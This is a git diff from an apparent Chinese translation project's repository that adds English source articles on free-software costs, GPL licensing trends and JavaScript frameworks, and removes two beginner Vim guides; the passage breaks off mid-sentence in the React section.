http://news.softpedia.com/news/let-s-chat-windows-vs-linux-512842.shtml + +作者:[Bogdan Popa][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/bogdan-popa +[1]:http://news.softpedia.com/editors/browse/bogdan-popa +[2]:http://news.softpedia.com/news/let-s-chat-windows-vs-linux-512842.shtml# +[3]:https://share.flipboard.com/bookmarklet/popout?v=2&title=Let%E2%80%99s+Chat%3A+Windows+vs.+Linux&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Flet-s-chat-windows-vs-linux-512842.shtml&t=1487122876&utm_campaign=widgets&utm_medium=web&utm_source=flipit&utm_content=news.softpedia.com +[4]:http://news.softpedia.com/news/let-s-chat-windows-vs-linux-512842.shtml# +[5]:http://twitter.com/intent/tweet?related=softpedia&via=bgdftw&text=Let%E2%80%99s+Chat%3A+Windows+vs.+Linux&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Flet-s-chat-windows-vs-linux-512842.shtml +[6]:https://plus.google.com/share?url=http://news.softpedia.com/news/let-s-chat-windows-vs-linux-512842.shtml +[7]:https://twitter.com/intent/follow?screen_name=bgdftw diff --git a/sources/talk/20170213 Free as in puppy The hidden costs of free software.md b/sources/talk/20170213 Free as in puppy The hidden costs of free software.md new file mode 100644 index 0000000000..e3c066d6f2 --- /dev/null +++ b/sources/talk/20170213 Free as in puppy The hidden costs of free software.md @@ -0,0 +1,64 @@ +Free as in puppy: The hidden costs of free software +============================================================ + + ![Free as in puppy: The hidden costs of free software](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/osdc_whitehurst_money.png?itok=Xqow4bzq "Free as in puppy: The hidden costs of free software") +Image by : opensource.com + +We're used to hearing of software being described as "free as in freedom" and "free as in beer." But there's another kind of "free" that doesn't get talked about as much: "free as in puppy." This concept is based around the idea that when someone gives you a free puppy, that puppy isn't really free. There's a lot of work and expenses that go into its daily care. The business term is "total cost of ownership," or TCO, and it applies to anything, not just open source software and puppies. + +So if the free puppy problem applies to everything, how is it important to open source software specifically? There are a few ways. First, if you're already paying for software, then you've set the expectation that it has costs. Software that's free up front but costs money later seems like a major imposition. Secondly, if it happens on an organization's first open source adoption project, it can put the organization off of adopting open source software in the future. Lastly and counterintuitively, showing that open source software has a cost may make it an easier "sell." If it's truly no cost, it seems too good to be true. + +The following sections represent common areas for software costs to sneak in. This is by no means a comprehensive list. + +### Setup costs + +To begin using software, you must first have the software. + +* **Software:** Just because it's open source doesn't necessarily mean it's _gratis_. +* **Hardware:** Consider the requirements of the software. If you don't have the hardware that (this could be server hardware or client hardware) you need to use the software, you'll need to buy it. +* **Training:** Software is rarely completely intuitive. The choice is to get training or figure it out on your own. +* **Implementation** Getting all of the pieces in the same room is only the start. Now, it's time to put the puzzle together. + + * **Installation and configuration:** At a minimum this will take some staff time. If it's a big project, you may need to pay a systems integrator or some other vendor to do this. + * **Data import:** If you're replacing an existing system, there is data to move into a new home. In a happy world where everything complies with the same standard, this is not a problem. In many cases, though, it may be necessary to write some scripts to extract and reload data. + * **Interfaces with other systems:** Speaking of writing scripts, does this software tie in nicely with other software you use (for example, your directory service or your payroll software)? + * **Customization:** If the software doesn't meet all of your needs out of the box, it may need to be customized. You can do that, but it still requires effort and maybe some materials. +* **Business changes:** This new software will probably change how your organization does something—hopefully for the better. However, the shift isn't free. For example, productivity may dip initially as staff get used to the new software. + +### Operational costs + +Getting the software installed is the easy part. Now you have to use it. + +* **More training:** What, did you think we were done with this? Over time, new people will probably join your organization and they will also need to learn how to use the software, or a new release will come out that adds additional functionality. +* **Maintenance:** + + * **Subscription:** Some software provides updates via a paid subscription. + * **Patches:** Depending on the nature of the software, there may be some effort in applying patches. This includes both testing and deployment. + * **Development:** Did you make any customizations yourself? Now you have to maintain those forever. +* **Support:** Someone has to fix it when it goes wrong, and whether that's a vendor or your own team, there's a real cost. +* **Good citizenship:** This one isn't a requirement, but if you're using open source software, it would be nice if you gave back somehow. This might be code contributions, providing support on the mailing list, sponsoring the annual conference, etc. +* **Business benefits:** Okay, so this isn't a cost, but it can offset some of the costs. What does using this software mean for your organization? If it enables you to manufacture widgets with 25% less waste, then that's valuable. To provide another example, maybe it helps you increase repeat contributions to your nonprofit by 30%. + +Even with a list like this, it takes a lot of imagination to come up with all of the costs. Getting the values right requires some experience and a lot of good guessing, but just going through the process helps make it more clear. Much like with a puppy, if you know what you're getting yourself into up front, it can be a rewarding experience. + +-------------------------------------------------------------------------------- + +作者简介: + +Ben Cotton - Ben Cotton is a meteorologist by training and a high-performance computing engineer by trade. Ben works as a technical evangelist at Cycle Computing. He is a Fedora user and contributor, co-founded a local open source meetup group, and is a member of the Open Source Initiative and a supporter of Software Freedom Conservancy. Find him on Twitter (@FunnelFiasco) + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/hidden-costs-free-software + +作者:[Ben Cotton ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/bcotton +[1]:https://opensource.com/article/17/2/hidden-costs-free-software?rate=gXfsYPWiIQNslwJ3zOAje71pTMRhp25Eo0HTdLWOKv4 +[2]:https://opensource.com/user/30131/feed +[3]:https://opensource.com/article/17/2/hidden-costs-free-software#comments +[4]:https://opensource.com/users/bcotton diff --git a/sources/talk/20170213 The decline of GPL.md b/sources/talk/20170213 The decline of GPL.md new file mode 100644 index 0000000000..491b9c2930 --- /dev/null +++ b/sources/talk/20170213 The decline of GPL.md @@ -0,0 +1,93 @@ +The decline of GPL? +============================================================ + + ![The decline of GPL?](https://opensource.com/sites/default/files/styles/image-full-size/public/images/law/LAW_vaguepatent_520x292.png?itok=9It-cWjB "The decline of GPL?") +Image by : opensource.com + +A little while ago I saw an interesting tweet from Stephen O'Grady at RedMonk [on the state of open source licensing][2], including this graph. + + ![Redmonk Black Duck Licensing](https://opensource.com/sites/default/files/resize/oss-blk-duck-licensing-0110-0117-wm-2-520x344.png "Redmonk Black Duck Licensing") + +This graph shows how license usage has changed from 2010 to 2017\. In reading it, it is clear that usage of the GPL 2.0 license, one of the purest copyleft licenses around, has more than halved in usage. According to the chart it would appear that the popularity of open source licensing has subsequently shifted to the [MIT][3] and [Apache][4] licenses. There has also been a small increase in [GPL 3.0][5] usage. + +So, what does all this mean? + +Why has GPL 2.0 usage dropped so dramatically with only a marginal increase in GPL 3.0 usage? Why has MIT and Apache usage grown so dramatically? + +Of course, there are many interpretations, but my guess is that this is due to the increased growth in open source in business, and a nervousness around the GPL in the commercial world. Let's dig in. + +### The GPL and business + +Now, before I get started, I know I am going to raise the ire of some GPL fans. Before you start yelling at me, I want to be very clear: I am a huge fan and supporter of the GPL. + +I have licensed every piece of software I have ever written under the GPL, I have been an active financial supporter of the [Free Software Foundation][6] and [Software Freedom Conservancy][7] and the work they do, and I advocate for the usage of the GPL. My comments here are not about the validity or the great value of the GPL—it is an unquestionably great license—but more about the perception and interpretation of the license in the industry. + +About four years ago, I was at an annual event called the Open Source Think Tank. This event was a small, intimate, annual gathering of executives in the open source industry in the California wine country. The event focused on networking, building alliances, and identifying and addressing industry problems. + +At this event, there was a group case study in which the attendees were broken into smaller groups and asked to recommend an open source license for a real-world project that was building a core open source technology. Each group read back their recommendations, and I was surprised to see that every one of the 10 or so groups suggested a permissive license, and not one suggested the GPL. + +I had seen an observational trend in the industry towards the Apache and MIT licenses, but this raised a red flag at the time about the understanding, acceptance, and comfort of the GPL in the open source industry. + +It seems that in recent years that trend has continued. Aside from the Black Duck research, a [license study in GitHub][8] in 2015 found that the MIT license was a dominant choice. Even observationally in my work at XPRIZE (where we chose a license for the [Global Learning XPRIZE][9]), and my work as a [community leadership consultant][10], I have seen a similar trend with many of my clients who feel uncomfortable licensing their code under GPL. + +With an [estimated 65% of companies contributing to open source][11], there has clearly been a growth in commercial interest and investment since 2010\. I believe this, tied with the trends I just outlined, would suggest that the industry does not feel the GPL is generally the right choice for an open source business. + +### Interfacing community and company + +To be honest, GPL's declining popularity is not entirely surprising, and for a few reasons. + +Firstly, as the open source industry has evolved, it has become clear that finding the right balance of community engagement and a business model that... y'know... actually works, is a key decision. There was a misconception in the early days of open source that, "If you build it, they will come." Sure, they often came to use your software, but in many cases, "If you built it, they wouldn't necessarily give you any money." + +As the years have progressed we have seen various companies, such as Red Hat, Automattic, Docker, Canonical, Digital Ocean, and others, explore different methods of making money in open source. This has included distribution models, services models, open core models, and more. What has become clear is that the traditional software scarcity model doesn't work with open source code; therefore, you need to choose a license that supports the needs of the model the company chooses. Getting this balance between revenue and providing your technology for free is a tough prospect for many. + +This is where we see the rub. While the GPL is an open source license, it is fundamentally a Free Software license. As a Free Software license, much of the stewardship and support for the GPL has been driven by the Free Software Foundation. + +As much as I love the work of the Free Software Foundation, their focus has ultimately been anchored from the perspective that software absolutely has to be 100% free. There isn't much room for compromise with the FSF, and even well-recognized open source projects (such as many Linux distributions) have been deemed "non-free" due to a tiny bit of binary firmware. + +This proves complicated for businesses where there is rarely a black and white set of choices and there is instead a multitude of grey. Few businesses share the pure ideology of the Free Software Foundation (or similar groups such as the Software Freedom Conservancy), and thus I suspect businesses are less comfortable about choosing a license that is so connected to such a pure ideology. + +Now, to be clear, I don't blame the FSF (and similar organizations such as the SFC) for this. They have a specific mandate and mission focused on building a comprehensive free software commons, and it is perfectly reasonable for them to draw their line in the sand wherever they choose. The FSF and SFC do _phenomenal_ work and I will long continue to be a supporter of them and the many wonderful people who work there. I just believe that a consequence of such purity is that companies may feel uneasy being able to meet the mark, and thus chose to use a different choice of license than the GPL. + +I suspect what has also affected GPL usage is a change in dynamic as open source has grown. In the early days, one of the core fundamental reasons why projects would start was a rigorous focus on openness and the ethical elements of software freedom. The GPL was unsurprisingly a natural choice for this projects, with Debian, Ubuntu, Fedora, Linux, and many others as examples. + +In recent years though we have seen a newer generation of developers form for whom there is a less critical, and if I dare say it, less religious focus on freedom. For them, open source is a pragmatic and practical component in building software as opposed to an ethical choice, and I suspect this is why we have seen such a growth in the use of MIT and Apache licenses. + +### The future? + +What does this mean for the GPL? + +My guess is that the GPL will continue to be a popular choice of license, but developers will view it increasingly as a purer free software license. I suspect that projects that have an ethical commitment to software freedom will prioritize the GPL over other licenses, but for businesses where there needs to be the balance we discussed earlier, I suspect the MIT and Apache licenses will continue to grow in popularity. + +Either way, the great news is that open source and free software is growing, and while there may be complexity and change in how licenses are used, what matters more is that technology is increasingly becoming open, accessible, and available to everyone. + +-------------------------------------------------------------------------------- + +作者简介: + +Jono Bacon - Jono Bacon is a leading community manager, speaker, author, and podcaster. He is the founder of Jono Bacon Consulting which provides community strategy/execution, developer workflow, and other services. He also previously served as director of community at GitHub, Canonical, XPRIZE, OpenAdvantage, and consulted and advised a range of organizations. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/decline-gpl + +作者:[Jono Bacon][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jonobacon +[1]:https://opensource.com/article/17/2/decline-gpl?rate=WfBHpUyo5BSde1SNTJjuzZTJbjkZTES77tcHwpfTMdU +[2]:https://twitter.com/sogrady/status/820001441733607424 +[3]:https://opensource.org/licenses/MIT +[4]:http://apache.org/licenses/ +[5]:https://www.gnu.org/licenses/gpl-3.0.en.html +[6]:http://www.fsf.org/ +[7]:https://sfconservancy.org/ +[8]:https://github.com/blog/1964-open-source-license-usage-on-github-com +[9]:http://learning.xprize.org/ +[10]:http://www.jonobacon.org/consulting +[11]:https://opensource.com/business/16/5/2016-future-open-source-survey +[12]:https://opensource.com/user/26312/feed +[13]:https://opensource.com/article/17/2/decline-gpl#comments +[14]:https://opensource.com/users/jonobacon diff --git a/sources/tech/20120301 The Beginner’s Guide to Start Using Vim - part 1.md b/sources/tech/20120301 The Beginner’s Guide to Start Using Vim - part 1.md deleted file mode 100644 index bc6be5f24a..0000000000 --- a/sources/tech/20120301 The Beginner’s Guide to Start Using Vim - part 1.md +++ /dev/null @@ -1,125 +0,0 @@ -Tarnslating by Yinr - -The Beginner’s Guide to Start Using Vim -============================================================ - ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/03/vim-beginner-guide-featured.jpg "The Beginner's Guide to Start Using Vims") - - -This article is part of the [VIM User Guide][12] series: - -* The Beginner’s Guide to Start Using Vim -* [Vim Keyboard Shortcuts Cheatsheet][3] -* [5 Vim Tips and Tricks for Experienced Users][4] -* [3 Useful VIM Editor Tips and Tricks for Advanced Users][5] - -Choosing a text editor is a very important decision for a programmer. This is partly because of the plethora of variables: graphical/non-graphical interfaces, different shortcuts, language specializations, plugins, customizations, etc. My advice is not to try to search for the best one. Instead, choose the one that corresponds best to your habits and your tasks. If you want to work in a group, it’s generally best to select the same editor as your co-worker. That way, if you have a problem, you will be able to find some help. - -It is exactly for that reason that I started using Vim a few years ago. Traditionally, Vim is placed in conflict with the legendary Emacs. I confess that I know very little about Emacs, but what you have to know about these two text editors is that they can both be fully customized, and very confusing at first. This tutorial will not explain everything about Vim but will try to give you the basics to use it correctly in the first place, and then present a few tips that will (I hope) allow you to learn on your own. - -Vim comes from “VI iMproved”. Vi is a non-graphical text editor widely distributed in Unix systems. It comes by default with Linux. Vim is an enhancement of this original editor. However, unlke Vi, Vim is not installed by default on every distribution. - -### Installation - -To install Vim on Ubuntu, use the command: - -``` -sudo apt-get install vim -``` - -If you are already interested in some plugins, use the command: - -``` -sudo apt-cache search vim -``` - -This will give you a long list of packages related to Vim. Among them are some for various programming languages, addon managers, etc. - -For this tutorial, I will be using the latest version of Vim (7.3.154) on Ubuntu. You can use any other version though. - -### Warming Up - -Type the command `vim` in a terminal. You should see a nice welcome screen. - - ![vim-welcome](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-welcome.jpg "vim-welcome") - -And if you’ve never used Vi or Vim before, it is very likely that you don’t even know how to exit… Yes, it’s true. **None of the shortcuts you normally use will work in Vim**. - -First of all, to use any menu-type function like save or exit, your command should begin with a colon (:). Saving is `:w` and quitting is `:q`. If you want to quit a file without saving, use the force quit command `:q!`. A cool thing with Vim is that you don’t have to type commands separately. In other words, if you want to save and then quit, you can directly use `:wq`. - -So for now, quit Vim and open it on a sample text file. Simply add the name of the text file that you want to edit after the command: - -``` -vim [text file name] -``` - - ![vim-file](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-file.jpg "vim-file") - -By default, when you open a text file, you are in visual mode. It is quite specific to Vim and confusing at the beginning. Vim is composed mainly of two modes: visual and editing. The visual mode is for viewing a text and using some commands. To go into editing mode, just press `i` to insert and `a` to add some text. To go back into the visual mode and access all the menu-type functions, press the “Escape” key. The difference between insertion and addition is simply whether you want the text you type to appear before or after the cursor in visual mode. To understand this fully, you should really try it yourself. My advice is: add at the end of lines, and insert in other cases. - -To move the cursor within a text, whether you are in visual or editing mode, you can generally use the keyboard arrows. A real purist would tell you to use the keys _h_ for left, _j_for down, _k_ for up, and _l_ for right. - -Now that you are warmed up and know how to control Vim at a basic level, let’s go to the core. - -### A few basic commands - -Now that you master the transformation from visual to editing mode, here are a few commands that you can use in visual mode: - -* _x_: to delete a character -* _u_: to undo an action (the equivalent of Ctrl+z) -* _dd_: to delete a line -* _dw_: to delete a word -* _yy_: to copy a line -* _yw_: to copy a word -* _p_: to paste the previously deleted or copied line or word -* _e _: to move to the next word (faster than just moving with the arrow keys) -* _r_: to replace a letter (press _r_, then the new letter) - -And of course, there are more, but this is enough for now. If you master all of them, you will already be very fluent with Vim. - -As a side note for those who always want more, you can type a number before any of these commands and the command will be executed that number of times. For example, _5x_ will delete five characters in a row, while _3p_ will paste three times. - -### Advanced Commands - -Finally, as a bonus and an appetizer for your own research, here are a few advanced and very useful commands: - -* _/searched_word _: to search for a word within the text -* _:sp name_of_a_text_file_: will split the screen in half horizontally, showing the new text file in the other half. To shift the focus from the right to the left window, use the shortcut Ctrl+w - - ![vim-sp](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-sp.jpg "vim-sp") - -* _:vsp name_of_a_text_file_: same as before, but splits the screen vertically -* Ctrl+Shift+C and Ctrl+Shift+V: to copy and paste text in a terminal -* _:! name_of_a_command_: to launch a command external to Vim, directly into your shell. For example, `:! ls` will display the files within the directory you are currently working in, without quitting the editor - - ![vim-ls](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2012/02/vim-ls.jpg "vim-ls") - -### Conclusion - -I think you now have every tool you need to start using Vim. You can go even further by installing the various plugins, editing the _.vimrc_ file, or even using the interactive tutor by typing the command _vimtutor_. - -If you have any other commands that you would like to share about Vim, please let us know in the comments. - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/start-with-vim-linux/ - -作者:[Himanshu Arora][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/himanshu/ -[1]:https://www.maketecheasier.com/author/adrienbrochard/ -[2]:https://www.maketecheasier.com/start-with-vim-linux/#comments -[3]:https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/ -[4]:https://www.maketecheasier.com/vim-tips-tricks-for-experienced-users/ -[5]:https://www.maketecheasier.com/vim-tips-tricks-advanced-users/ -[6]:https://www.maketecheasier.com/category/linux-tips/ -[7]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F -[8]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F&text=The+Beginner%26%238217%3Bs+Guide+to+Start+Using+Vim -[9]:mailto:?subject=The%20Beginner%E2%80%99s%20Guide%20to%20Start%20Using%20Vim&body=https%3A%2F%2Fwww.maketecheasier.com%2Fstart-with-vim-linux%2F -[10]:https://www.maketecheasier.com/turn-dropbox-into-a-blogging-tool-with-scriptogram/ -[11]:https://www.maketecheasier.com/4-sms-back-up-applications-to-keep-your-messages-safe-android/ -[12]:https://www.maketecheasier.com/series/vim-user-guide/ -[13]:https://support.google.com/adsense/troubleshooter/1631343 diff --git a/sources/tech/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md b/sources/tech/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md deleted file mode 100644 index 20a70f98eb..0000000000 --- a/sources/tech/20131227 Vim Keyboard Shortcuts Cheatsheet - part2.md +++ /dev/null @@ -1,218 +0,0 @@ -Martin translating... - -Vim Keyboard Shortcuts Cheatsheet -============================================================ - ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2013/12/vim-shortcut-cheatsheet-featured.jpg "Vim Keyboard Shortcuts Cheatsheets") - -This article is part of the [VIM User Guide][12] series: - -* [The Beginner’s Guide to Start Using Vim][3] -* Vim Keyboard Shortcuts Cheatsheet -* [5 Vim Tips and Tricks for Experienced Users][4] -* [3 Useful VIM Editor Tips and Tricks for Advanced Users][5] - -The Vim editor is a command-line based tool that’s an enhanced version of the venerable vi editor. Despite the abundance of graphical rich text editors, familiarity with Vim will help every Linux user — from an experienced system administrator to a newbie Raspberry Pi user. - - -The light-weight editor is a very powerful tool. In the hands of an experienced operator, it can do wonders. Besides regular text editing functions, the editor also supports advanced features such as find & replace based on regular expressions and encoding conversion as well as programming features such as syntax highlighting and code folding. - -One important thing to note when using Vim, is that the function of a key depends on the “mode” the editor is in. For example, pressing the alphabet “j” will move the cursor down one line in the “command mode”. You’ll have to switch to the “insert mode” to make the keys input the character they represent. - -Here’s a cheatsheet to help you get the most out of Vim. - - - - -### Main - -| Shortcut Keys | Function | -| --- | --- | -| Escape key | Gets out of the current mode into the “command mode”. All keys are bound of commands. | -| i | “Insert mode” for inserting text. Keys behave as expected. | -| : | “Last-line mode” where Vim expects you to enter a command such as to save the document. | - - - -### Navigation keys - -| Shortcut Keys | Function | -| --- | --- | -| h | moves the cursor one character to the left. | -| j or Ctrl + J | moves the cursor down one line. | -| k or Ctrl + P | moves the cursor up one line. | -| l | moves the cursor one character to the right. | -| 0 | moves the cursor to the beginning of the line. | -| $ | moves the cursor to the end of the line. | -| ^ | moves the cursor to the first non-empty character of the line | -| w | move forward one word (next alphanumeric word) | -| W | move forward one word (delimited by a white space) | -| 5w | move forward five words | -| b | move backward one word (previous alphanumeric word) | -| B | move backward one word (delimited by a white space) | -| 5b | move backward five words | -| G | move to the end of the file | -| gg | move to the beginning of the file. | - - - -### Navigate around the document - -| Shortcut Keys | Function | -| --- | --- | -| ( | jumps to the previous sentence | -| ) | jumps to the next sentence | -| { | jumps to the previous paragraph | -| } | jumps to the next paragraph | -| [[ | jumps to the previous section | -| ]] | jumps to the next section | -| [] | jump to the end of the previous section | -| ][ | jump to the end of the next section | - - - -### Insert text - -| Shortcut Keys | Function | -| --- | --- | -| a | Insert text after the cursor | -| A | Insert text at the end of the line | -| i | Insert text before the cursor | -| o | Begin a new line below the cursor | -| O | Begin a new line above the cursor | - - - -### Special inserts - -| Shortcut Keys | Function | -| --- | --- | -| :r [filename] | Insert the file [filename] below the cursor | -| :r ![command] | Execute [command] and insert its output below the cursor | - - - -### Delete text - -| Shortcut Keys | Function | -| --- | --- | -| x | delete character at cursor | -| dw | delete a word. | -| d0 | delete to the beginning of a line. | -| d$ | delete to the end of a line. | -| d) | delete to the end of sentence. | -| dgg | delete to the beginning of the file. | -| dG | delete to the end of the file. | -| dd | delete line | -| 3dd | delete three lines | - -### Simple replace text - -| Shortcut Keys | Function | -| --- | --- | -| r{text} | Replace the character under the cursor with {text} | -| R | Replace characters instead of inserting them | - -### Copy/Paste text - -| Shortcut Keys | Function | -| --- | --- | -| yy | copy current line into storage buffer | -| ["x]yy | Copy the current lines into register x | -| p | paste storage buffer after current line | -| P | paste storage buffer before current line | -| ["x]p | paste from register x after current line | -| ["x]P | paste from register x before current line | - -### Undo/Redo operation - -| Shortcut Keys | Function | -| --- | --- | -| u | undo the last operation. | -| Ctrl+r | redo the last undo. | - -### Search and Replace keys - -| Shortcut Keys | Function | -| --- | --- | -| /search_text | search document for search_text going forward | -| ?search_text | search document for search_text going backward | -| n | move to the next instance of the result from the search | -| N | move to the previous instance of the result | -| :%s/original/replacement | Search for the first occurrence of the string “original” and replace it with “replacement” | -| :%s/original/replacement/g | Search and replace all occurrences of the string “original” with “replacement” | -| :%s/original/replacement/gc | Search for all occurrences of the string “original” but ask for confirmation before replacing them with “replacement” | - -### Bookmarks - -| Shortcut Keys | Function | -| --- | --- | -| m {a-z A-Z} | Set bookmark {a-z A-Z} at the current cursor position | -| :marks | List all bookmarks | -| `{a-z A-Z} | Jumps to the bookmark {a-z A-Z} | - - -### Select text - -| Shortcut Keys | Function | -| --- | --- | -| v | Enter visual mode per character | -| V | Enter visual mode per line | -| Esc | Exit visual mode | - - -### Modify selected text - -| Shortcut Keys | Function | -| --- | --- | -| ~ | Switch case | -| d | delete a word. | -| c | change | -| y | yank | -| > | shift right | -| < | shift left | -| ! | filter through an external command | - - -### Save and quit - -| Shortcut Keys | Function | -| --- | --- | -| :q | Quits Vim but fails when file has been changed | -| :w | Save the file | -| :w new_name | Save the file with the new_name filename | -| :wq | Save the file and quit Vim. | -| :q! | Quit Vim without saving the changes to the file. | -| ZZ | Write file, if modified, and quit Vim | -| ZQ | Same as :q! Quits Vim without writing changes | - -### Download VIM Keyboard Shortcuts Cheatsheet - -Can’t get enough of this? We have prepared a downloadable cheat sheet for you so you can access to it when you need it. - -[Download it here!][14] - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/ - -作者:[Himanshu Arora][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/himanshu/ -[1]:https://www.maketecheasier.com/author/mayank/ -[2]:https://www.maketecheasier.com/vim-keyboard-shortcuts-cheatsheet/#comments -[3]:https://www.maketecheasier.com/start-with-vim-linux/ -[4]:https://www.maketecheasier.com/vim-tips-tricks-for-experienced-users/ -[5]:https://www.maketecheasier.com/vim-tips-tricks-advanced-users/ -[6]:https://www.maketecheasier.com/category/linux-tips/ -[7]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F -[8]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F&text=Vim+Keyboard+Shortcuts+Cheatsheet -[9]:mailto:?subject=Vim%20Keyboard%20Shortcuts%20Cheatsheet&body=https%3A%2F%2Fwww.maketecheasier.com%2Fvim-keyboard-shortcuts-cheatsheet%2F -[10]:https://www.maketecheasier.com/locate-system-image-tool-in-windows-81/ -[11]:https://www.maketecheasier.com/create-system-image-in-windows8/ -[12]:https://www.maketecheasier.com/series/vim-user-guide/ -[13]:https://support.google.com/adsense/troubleshooter/1631343 -[14]:http://www.maketecheasier.com/cheatsheet/vim-keyboard-shortcuts-cheatsheet/ diff --git a/sources/tech/20160325 Network automation with Ansible.md b/sources/tech/20160325 Network automation with Ansible.md index 0f543a3c18..4c53403063 100644 --- a/sources/tech/20160325 Network automation with Ansible.md +++ b/sources/tech/20160325 Network automation with Ansible.md @@ -1,3 +1,5 @@ +Martin translating... + Network automation with Ansible ================ diff --git a/sources/tech/20160707 6 Best JavaScript Frameworks to Learn In 2016.md b/sources/tech/20160707 6 Best JavaScript Frameworks to Learn In 2016.md new file mode 100644 index 0000000000..d0b21b19ce --- /dev/null +++ b/sources/tech/20160707 6 Best JavaScript Frameworks to Learn In 2016.md @@ -0,0 +1,140 @@ +GHLandy Tranlating + +6 Best JavaScript Frameworks to Learn In 2016 +=========================================== + + ![6 Best JavaScript Frameworks to Learn In 2016](https://discoversdkcdn.azureedge.net/postscontent/products/java.png) + +**If all roads lead to Rome, which one should we take? **JavaScript has been known in the web development community since the arrival of modern technologies that helped in the building of the front-end of websites. It supports HTML (that is used for the _presentation _or _layout _of the pages) by extending its several functionalities and providing the logical executions on the website. Without it, websites can't have any _interactive _features. + +The modern culture of Frameworks and Libraries has risen from the abyss when older technologies started to separate the functionalities into modules. Now, instead of supporting everything in the core language, the developers made it free for everyone to create libraries and frameworks that enhance the functionality of the core language. This way, the flexibility of the language has been increased dramatically. + +If you have been using **JavaScript** (along with **JQuery**) to support HTML, then you know that it requires a great deal of effort and complex in code to develop and the maintain a large application. JavaScript Frameworks help to quickly build interactive web applications (which includes both single page and multiple page applications). + +When a newbie developer wants to learn JavaScript, he is usually attracted to JavaScript Frameworks which, thanks to the huge rise in their communities, any developer can easily learn from online tutorials and other resources. + +But, alas! Most programmers find it hard to decide which framework to learn and use from. Thus, in this article, I am going to highlight the 6 Best JavaScript Frameworks to learn in 2016\. Let's get started! + +**6 Best JavaScript Frameworks to Learn In 2016** + +**1) AngularJS** + +** + ![Angular](https://discoversdkcdn.azureedge.net/postscontent/products/AngularJS_logo.svg.png) +** + +**(Note: This is my personal favorite JavaScript Framework)** + +Whenever someone hears about JavaScript, there is a high probability that they have already heard about AngularJS, as this is the most commonly used JavaScript Framework among the JavaScript community. Released in 2009, it was developed by Google (which is convincing enough to use it), and it's an open-source project, which means you can read, edit and modify the original source code for your specific needs without giving any money to its developers (isn't that cool?). + +If you have difficulty building complex web applications through pure JavaScript code, then you will jump out of your seat in excitement to know that it will dramatically ease your life. It supports the **MVC (Model–view–controller)** design paradigm which supports standard two-way data binding. In case you are not familiar with MVC, then know that it just means that your data is updated on both the front-end (i.e. user-interface side) and back-end (i.e. coding or server side) whenever it detects some changes in the engine. + +MVC drastically reduces the time and efforts needed for building complex applications, as you need to focus on one area at a time (because DOM programming interface synchronizes the view and the model). As the _View _components are separated from the _Model _components, you can easily build reusable components for amazing and cool looking user-interfaces! + +If for any reason, you have used **TypeScript** (which is a language similar to JavaScript), then you will feel at home with AngularJS, as its syntax highly resembles the TypeScript syntax. This choice was made to attract the audience as **TypeScript** was gaining popularity. + +Angular 2.0 has recently been released, which claims to improve the performance of mobile, which is enough to convince new developers that this framework is high in development and updates regularly. + +There are many users of AngularJS, including (but not limited to) Udemy, Forbes, GoDaddy, Ford, NBA, The Oscars, etc. + +This JavaScript Framework is highly recommended for anyone who wants a powerful MVC framework with a strong and modern infrastructure that takes care of everything for you to build single page applications. This should be the first stop-shop for any experienced JavaScript developer. + +**2) React** + +** + ![React](https://discoversdkcdn.azureedge.net/postscontent/react%20%281%29.png) +** + +Similar to AngularJS, React is also an **MVC (Model-View-Controller)** type framework, however, it focuses entirely on the _View _components (as it was specifically designed for the UI) and can be seamlessly integrated with any architecture. This means you can use it right away for your websites! + +It abstracts the DOM programming interface (and thus uses the virtual DOM) from the core functionality, so you get extremely fast rendering of the UI, which enables you to use it from **_node.js_** as a client-side framework. It was developed as an open-source project by Facebook with various contributions from other people. + +If you have seen and like Facebook and Instagram’s interfaces, then you will love React. Through React, you can design simple views for each state in your application, and when the data changes, then it updates automatically. Any kind of complex UIs can be created, which can be reused in whatever applications you want. For the servers, React also supports rendering using **_node.js_**. React is flexible enough to use with other interfaces. + +Apart from Facebook and Instagram, there are several companies that use React, including Whatsapp, BBC, 